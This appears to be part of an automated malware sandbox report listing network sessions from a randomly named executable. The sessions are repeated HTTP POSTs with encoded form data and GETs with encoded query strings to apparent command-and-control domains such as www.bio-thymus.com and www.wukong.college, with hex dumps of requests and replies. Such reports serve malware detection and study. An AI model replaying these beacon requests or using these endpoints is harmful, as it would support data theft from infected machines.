                                                                                                                                                  Data Ascii: W638b4U=t1cnTZ5xaz4ZH6Eg+JnTC6SqJ03fLwTNxhXg1EgEAZgc+Vn4ToFzNvqng5ZJQP5QandBap15K48B4V4g58Nqkozag/BTb59uyxdLy7UifxBvN6XTJLS+anzQGITQ3MyyP6x3R06rb8Yb+0/Hyqx+jtaM74M9EJu+ZSBjkb1w+FMi+IsH8j8HU5Nnpq4YGxCemxlAGEzXfoGPne3HDOuHchVvV1pYUGdJa1BA75+im7QPhZAORSsGFEagsZQD1nLFksemAHZHHr0dn6CFuAWbBN7AVGjekfhHg3kCPMlpQe1mKj1DrFpT8PyBEKzCvzh8yFktHzadSKfCpPKAvzOSA5U+QpPSx4Sc5Ds69m873XJtB5yxxBqTyEjHJpLPFC0ttmZIDYJmUrsYKuH6WjOSGt38HA1KQev2P4/lJAd3wVEmj5OTEDg1aZi6b1Oi00wciP4S9910tKkFIog7Crleqle25dhRXv+UoMAT5C4C2kgu/ALZ97msRIXwI7kxDMnmdcTrtDruVaK8qCY0nv9xINMjB+IRI/aW/Yfa3fCJ61ULCLoWvm98xoghJznZndC8PR5He0AEurWwwXtjhJVzRy7tMbTW+zfEkCPCy2DkD9lYLwui34x6BgFyklqf2EJ0Rq6nLf1y5iME/TZc68ZQ7Wo6QboQjizLOA4ga5Hk3PeAc3yxiyX8cHOQ8an/9OrrYbC7kidrT1EEZOAW0HRc/PM/zUjrayBnTE/BC7tAdO7+VXEZ7puTbMgEmXAkQCawX16czVifVecRYIW47B6+IAuPqVvm2XyxS7gjWOQAvvrQlkc+us/QOgznOay6ap7RoCB/juCD80EzDaqtjum6w7ay0f9JBX5HLqBm5hceuIYNcQAlL3qQzISsZHGarAFliLerKj+ZQ35UHRjIcf5rXb6iNtCS6IImslgLOVAbsr9bWgKCpJ3PK+8AL1+x5iIdqFu19gG76OTMoyclgunP2m5DPAyzjLso73gf8Uyrr+Sn [TRUNCATED]


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  32192.168.2.5500113.33.130.190804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:41:43.911240101 CET379OUTGET /0m8a/?W638b4U=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAr/vHodlZDokX5k5j35YEbCksENzyPa61ZxusEcT508vfTQ==&Xll=50hLc0Hhy HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.fiqsth.vip
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Nov 14, 2024 15:41:44.503148079 CET409INHTTP/1.1 200 OK
                                                                                                                                                  Server: openresty
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:41:44 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 269
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 57 36 33 38 62 34 55 3d 67 33 30 48 51 70 64 2b 48 67 4d 78 46 4f 73 76 79 34 66 42 44 34 65 50 44 47 2b 78 53 41 66 4c 6f 68 47 31 32 56 78 2b 57 4d 59 6a 2b 77 4b 41 52 4a 74 62 63 4f 43 77 6f 70 4e 77 41 74 74 79 4f 53 4e 33 58 36 6b 36 53 36 6f 44 32 7a 30 2b 2f 39 64 41 72 2f 76 48 6f 64 6c 5a 44 6f 6b 58 35 6b 35 6a 33 35 59 45 62 43 6b 73 45 4e 7a 79 50 61 36 31 5a 78 75 73 45 63 54 35 30 38 76 66 54 51 3d 3d 26 58 6c 6c 3d 35 30 68 4c 63 30 48 68 79 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?W638b4U=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAr/vHodlZDokX5k5j35YEbCksENzyPa61ZxusEcT508vfTQ==&Xll=50hLc0Hhy"}</script></head></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  33192.168.2.5500123.33.130.190804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:41:49.704267025 CET642OUTPOST /ezyn/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 208
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.bio-thymus.com
                                                                                                                                                  Origin: http://www.bio-thymus.com
                                                                                                                                                  Referer: http://www.bio-thymus.com/ezyn/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 45 6e 59 54 4c 73 4d 56 6e 41 46 4c 78 61 65 4b 4f 5a 38 33 64 57 31 66 7a 39 35 5a 71 63 54 35 4a 68 5a 50 51 74 6f 35 62 59 34 62 31 39 4c 69 62 5a 44 43 32 59 2b 30 58 54 65 49 41 2f 2f 4f 61 30 46 49 30 69 66 35 39 69 68 33 47 7a 39 54 4b 66 41 73 4e 76 34 56 42 32 41 76 38 4a 4d 79 58 64 43 42 77 38 70 51 65 7a 56 2b 49 33 6e 51 57 6f 4e 79 62 53 34 2b 56 54 59 6f 55 68 75 37 69 4c 42 38 72 55 63 63 6d 69 76 41 7a 63 75 77 63 35 4c 45 7a 53 33 4d 52 58 57 79 77 55 42 39 39 50 76 74 34 59 47 4f 51 4e 33 2f 7a 4a 6b 58 68 55 6a 56 69 4a 44 6d 62 55 37 53 68 67 63 53 56 2b 57 64 69 6e 67 3d
                                                                                                                                                  Data Ascii: W638b4U=EnYTLsMVnAFLxaeKOZ83dW1fz95ZqcT5JhZPQto5bY4b19LibZDC2Y+0XTeIA//Oa0FI0if59ih3Gz9TKfAsNv4VB2Av8JMyXdCBw8pQezV+I3nQWoNybS4+VTYoUhu7iLB8rUccmivAzcuwc5LEzS3MRXWywUB99Pvt4YGOQN3/zJkXhUjViJDmbU7ShgcSV+Wding=


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  34192.168.2.5500133.33.130.190804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:41:52.251157999 CET662OUTPOST /ezyn/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 228
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.bio-thymus.com
                                                                                                                                                  Origin: http://www.bio-thymus.com
                                                                                                                                                  Referer: http://www.bio-thymus.com/ezyn/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 45 6e 59 54 4c 73 4d 56 6e 41 46 4c 33 4b 75 4b 4a 2b 51 33 49 47 31 63 71 4e 35 5a 39 4d 54 39 4a 68 46 50 51 6f 51 50 62 72 63 62 79 63 37 69 61 63 76 43 31 59 2b 30 63 7a 65 4e 45 2f 2f 37 61 7a 4e 41 30 6a 6a 35 39 69 31 33 47 7a 74 54 4e 6f 63 6a 4e 2f 34 74 4a 57 41 58 79 70 4d 79 58 64 43 42 77 34 42 2b 65 31 39 2b 4c 47 58 51 57 4b 31 78 48 43 34 2f 42 44 59 6f 51 68 75 2f 69 4c 42 65 72 56 42 7a 6d 67 58 41 7a 5a 53 77 53 49 4c 48 36 53 32 4a 4a 33 58 77 31 78 63 46 37 75 7a 6d 34 5a 6a 32 41 65 48 34 32 2f 56 39 37 32 72 39 78 70 76 65 4c 48 7a 6c 77 51 39 37 50 64 47 74 38 77 30 76 69 72 47 48 36 51 2f 6e 51 37 56 54 72 2b 51 63 6b 43 5a 36
                                                                                                                                                  Data Ascii: W638b4U=EnYTLsMVnAFL3KuKJ+Q3IG1cqN5Z9MT9JhFPQoQPbrcbyc7iacvC1Y+0czeNE//7azNA0jj59i13GztTNocjN/4tJWAXypMyXdCBw4B+e19+LGXQWK1xHC4/BDYoQhu/iLBerVBzmgXAzZSwSILH6S2JJ3Xw1xcF7uzm4Zj2AeH42/V972r9xpveLHzlwQ97PdGt8w0virGH6Q/nQ7VTr+QckCZ6


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  35192.168.2.5500143.33.130.190804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:41:54.797796011 CET1679OUTPOST /ezyn/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 1244
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.bio-thymus.com
                                                                                                                                                  Origin: http://www.bio-thymus.com
                                                                                                                                                  Referer: http://www.bio-thymus.com/ezyn/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 45 6e 59 54 4c 73 4d 56 6e 41 46 4c 33 4b 75 4b 4a 2b 51 33 49 47 31 63 71 4e 35 5a 39 4d 54 39 4a 68 46 50 51 6f 51 50 62 72 55 62 79 75 7a 69 59 2f 58 43 30 59 2b 30 43 44 65 4d 45 2f 2f 63 61 79 70 45 30 6a 76 70 39 6e 78 33 48 56 68 54 49 64 6f 6a 47 2f 34 74 46 32 41 73 38 4a 4d 64 58 64 54 4b 77 38 6c 2b 65 31 39 2b 4c 45 50 51 66 34 4e 78 58 79 34 2b 56 54 59 6b 55 68 75 44 69 4c 59 70 72 56 46 5a 6e 55 72 41 30 39 4f 77 51 36 54 48 6d 43 32 4c 63 33 58 53 31 78 59 61 37 75 76 45 34 5a 48 51 41 65 2f 34 33 34 73 44 2b 48 6d 6a 69 2b 66 49 42 55 75 46 6e 30 4e 32 48 76 65 6e 32 67 73 4f 6d 37 69 79 30 51 43 6c 63 49 64 63 2b 37 59 38 30 31 6f 78 68 32 54 63 4e 2f 56 31 4a 49 4a 38 49 4d 79 45 68 6a 7a 36 75 68 72 68 31 36 6e 55 50 2b 68 38 75 45 38 2f 4e 69 53 32 64 59 30 35 52 44 51 57 58 56 69 4d 71 52 72 5a 77 36 64 45 31 6a 67 6b 46 56 48 79 4e 42 38 61 6f 52 4b 6f 57 58 73 58 35 6e 44 43 63 34 74 63 62 4b 6d 6a 34 77 52 7a 66 75 6c 4d 37 32 78 4f 59 70 76 71 57 78 [TRUNCATED]
                                                                                                                                                  Data Ascii: W638b4U=EnYTLsMVnAFL3KuKJ+Q3IG1cqN5Z9MT9JhFPQoQPbrUbyuziY/XC0Y+0CDeME//caypE0jvp9nx3HVhTIdojG/4tF2As8JMdXdTKw8l+e19+LEPQf4NxXy4+VTYkUhuDiLYprVFZnUrA09OwQ6THmC2Lc3XS1xYa7uvE4ZHQAe/434sD+Hmji+fIBUuFn0N2Hven2gsOm7iy0QClcIdc+7Y801oxh2TcN/V1JIJ8IMyEhjz6uhrh16nUP+h8uE8/NiS2dY05RDQWXViMqRrZw6dE1jgkFVHyNB8aoRKoWXsX5nDCc4tcbKmj4wRzfulM72xOYpvqWx7yiz/7beDIPtKH1rjXmZWF9zcpkmxl5sGZbRwv0bjyFkbMGnVxzyCq9qql60Qwh7W4rV5p5ngszZzBSHxxrzDWzl+FEnsjtzP/Ivu6CpNmrZsMUPYvcderWFqC8oBeEN/ekwS/WBEv11bdMmUaQWZdrUq/1XQX4M2gOAV05eCoHVe8Y96noD6iduYefvRDpJO4IpJDUaT6WbaHwi8nVeIAqms4r1HfI11AK1hUeuNOBMCb4hCbKb1WtrOOJCj+8WYPLwsUwyTShSyOVKr4eH4Lea9dRW4MhP7Hjk8BN1Ml71rkSmLLY+58RsLaIpQBPkMcPJU+XXq4Qv8jTe3voYZyWzNOUaQbQ54zNKNIIs/UDOPLc2G2xage8/ECHigocotcohxZO4ShHxQkZaHIIf7vvSyfbPrQB0J9RZ06JCFF3ln7WhVhWRvq5gtwkNT9oKLYcPzuE8I1UipIbF7NeQMQHPh1mIWiLNRUuvdIgpd+7MAn4l47s9n1qjFGEHUq89omHdSp1sOGnkChbVKE/VyzqVi4l9lJIIDM5xQzeH/TvzJjh2MPXswYukNJHpFJUcQIaPgI2IGs3Ot/vhv4GNBdIwzK/IoCE2LoT1VDoG5zeoOP186mGgnEK2EOT2iBv8tyt9aLOJMUe+tbu0x6e4XkS0AMERnc+O/8 [TRUNCATED]


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  36192.168.2.5500153.33.130.190804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:41:57.341712952 CET383OUTGET /ezyn/?W638b4U=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMJKMiK3EdvOJmV73Jy75+c2YHLSLsa6dhHSYwd0sxfTHy3A==&Xll=50hLc0Hhy HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.bio-thymus.com
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Nov 14, 2024 15:41:57.997410059 CET409INHTTP/1.1 200 OK
                                                                                                                                                  Server: openresty
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:41:57 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 269
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 57 36 33 38 62 34 55 3d 4a 6c 77 7a 49 5a 77 49 31 78 4a 46 71 6f 75 54 41 71 51 69 47 69 35 46 6e 5a 4a 65 70 2f 44 41 51 51 74 49 66 2f 46 30 54 38 77 70 2f 2f 50 61 66 74 62 67 73 71 43 44 57 67 4b 79 51 62 2f 77 4e 33 6c 31 34 51 48 6d 35 53 39 44 47 54 73 78 45 64 45 4d 4a 4b 4d 69 4b 33 45 64 76 4f 4a 6d 56 37 33 4a 79 37 35 2b 63 32 59 48 4c 53 4c 73 61 36 64 68 48 53 59 77 64 30 73 78 66 54 48 79 33 41 3d 3d 26 58 6c 6c 3d 35 30 68 4c 63 30 48 68 79 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?W638b4U=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMJKMiK3EdvOJmV73Jy75+c2YHLSLsa6dhHSYwd0sxfTHy3A==&Xll=50hLc0Hhy"}</script></head></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  37192.168.2.55001647.52.221.8804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:42:04.436578989 CET642OUTPOST /9ezc/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 208
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.wukong.college
                                                                                                                                                  Origin: http://www.wukong.college
                                                                                                                                                  Referer: http://www.wukong.college/9ezc/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 38 76 62 48 33 32 55 78 55 6a 4c 36 6f 75 70 74 4e 45 6e 31 68 79 43 49 76 32 4e 52 55 58 69 62 79 6d 65 34 7a 34 4d 72 56 59 72 78 6c 51 70 5a 33 4e 45 36 6b 30 43 5a 4f 6e 52 36 6a 35 68 44 71 35 30 6f 76 56 73 4e 46 6c 71 6e 78 54 39 71 78 73 64 31 48 35 6b 68 30 67 6e 70 79 61 74 51 63 71 78 6d 31 4a 4d 52 4e 4a 34 37 30 58 47 75 45 57 66 6c 65 43 57 77 74 48 41 50 4a 68 46 4d 6d 42 34 6c 61 64 73 46 50 70 4f 62 31 67 71 43 66 47 41 49 4c 4b 57 69 59 58 72 31 6e 34 4b 58 56 7a 46 43 2b 75 7a 57 6c 62 4b 5a 63 64 50 4e 43 31 4f 4e 39 44 4d 5a 56 47 6a 2f 67 68 31 2b 75 31 53 52 65 61 38 3d
                                                                                                                                                  Data Ascii: W638b4U=8vbH32UxUjL6ouptNEn1hyCIv2NRUXibyme4z4MrVYrxlQpZ3NE6k0CZOnR6j5hDq50ovVsNFlqnxT9qxsd1H5kh0gnpyatQcqxm1JMRNJ470XGuEWfleCWwtHAPJhFMmB4ladsFPpOb1gqCfGAILKWiYXr1n4KXVzFC+uzWlbKZcdPNC1ON9DMZVGj/gh1+u1SRea8=
                                                                                                                                                  Nov 14, 2024 15:42:05.386183977 CET390INHTTP/1.1 404 Not Found
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:42:05 GMT
                                                                                                                                                  Server: Apache
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  Content-Encoding: gzip
                                                                                                                                                  Content-Length: 179
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00
                                                                                                                                                  Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  38192.168.2.55001747.52.221.8804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:42:06.972146988 CET662OUTPOST /9ezc/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 228
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.wukong.college
                                                                                                                                                  Origin: http://www.wukong.college
                                                                                                                                                  Referer: http://www.wukong.college/9ezc/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 38 76 62 48 33 32 55 78 55 6a 4c 36 6f 50 35 74 43 48 2f 31 30 69 43 4c 6c 57 4e 52 66 33 69 58 79 6d 53 34 7a 35 49 37 57 71 2f 78 6b 30 6c 5a 6c 38 45 36 6a 30 43 5a 46 48 52 2f 67 4a 68 79 71 35 77 57 76 51 4d 4e 46 6c 2b 6e 78 51 70 71 78 66 31 79 47 70 6b 30 2f 41 6e 76 74 4b 74 51 63 71 78 6d 31 4a 59 37 4e 4a 67 37 33 6e 32 75 48 79 4c 6d 41 53 57 7a 36 33 41 50 4e 68 45 6b 6d 42 35 43 61 66 59 37 50 72 6d 62 31 6c 75 43 66 55 6b 4c 42 4b 57 6b 47 6e 71 43 71 49 72 4a 56 51 31 49 2b 6f 75 4d 6b 4e 65 4d 5a 72 2b 6e 59 58 47 6c 75 6a 67 68 46 56 72 49 78 52 55 58 30 57 43 68 41 4e 6f 7a 35 76 76 76 31 35 59 4e 75 59 72 51 32 47 74 30 41 43 4a 4b
                                                                                                                                                  Data Ascii: W638b4U=8vbH32UxUjL6oP5tCH/10iCLlWNRf3iXymS4z5I7Wq/xk0lZl8E6j0CZFHR/gJhyq5wWvQMNFl+nxQpqxf1yGpk0/AnvtKtQcqxm1JY7NJg73n2uHyLmASWz63APNhEkmB5CafY7Prmb1luCfUkLBKWkGnqCqIrJVQ1I+ouMkNeMZr+nYXGlujghFVrIxRUX0WChANoz5vvv15YNuYrQ2Gt0ACJK
                                                                                                                                                  Nov 14, 2024 15:42:07.926253080 CET390INHTTP/1.1 404 Not Found
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:42:07 GMT
                                                                                                                                                  Server: Apache
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  Content-Encoding: gzip
                                                                                                                                                  Content-Length: 179
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00
                                                                                                                                                  Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  39192.168.2.55001847.52.221.8804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:42:09.518564939 CET1679OUTPOST /9ezc/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 1244
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.wukong.college
                                                                                                                                                  Origin: http://www.wukong.college
                                                                                                                                                  Referer: http://www.wukong.college/9ezc/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 38 76 62 48 33 32 55 78 55 6a 4c 36 6f 50 35 74 43 48 2f 31 30 69 43 4c 6c 57 4e 52 66 33 69 58 79 6d 53 34 7a 35 49 37 57 71 6e 78 6c 48 74 5a 33 76 73 36 69 30 43 5a 49 6e 52 2b 67 4a 68 56 71 39 63 53 76 51 4a 77 46 6e 47 6e 6a 69 78 71 33 75 31 79 4e 70 6b 30 77 67 6e 71 79 61 73 49 63 71 68 71 31 4a 49 37 4e 4a 67 37 33 68 61 75 52 57 66 6d 43 53 57 77 74 48 41 4c 4a 68 46 4a 6d 48 51 39 61 66 64 4f 50 62 47 62 37 6c 2b 43 63 6d 38 4c 4e 4b 57 6d 48 6e 71 61 71 49 6e 6f 56 51 70 69 2b 6f 79 69 6b 4b 71 4d 59 66 62 64 66 7a 53 4e 79 43 67 74 56 43 2f 50 70 55 6b 6d 36 55 47 43 64 39 63 77 6d 66 76 58 33 2f 73 41 67 4c 69 44 69 58 74 69 58 32 34 33 2f 6d 6c 65 2b 59 35 67 35 69 4d 63 70 34 37 48 52 32 69 5a 63 42 4c 2b 37 2b 5a 73 2f 4b 4d 4c 76 68 78 36 46 70 4e 45 6a 39 6d 50 70 4a 43 6f 74 5a 44 50 6f 66 37 67 77 51 62 57 35 70 69 42 4d 56 76 6c 33 34 6a 30 73 4c 4c 4f 73 55 61 63 76 36 50 36 46 6b 45 46 67 4d 58 66 4d 49 4d 6c 73 59 42 54 6d 6f 78 7a 7a 4f 65 75 47 48 [TRUNCATED]
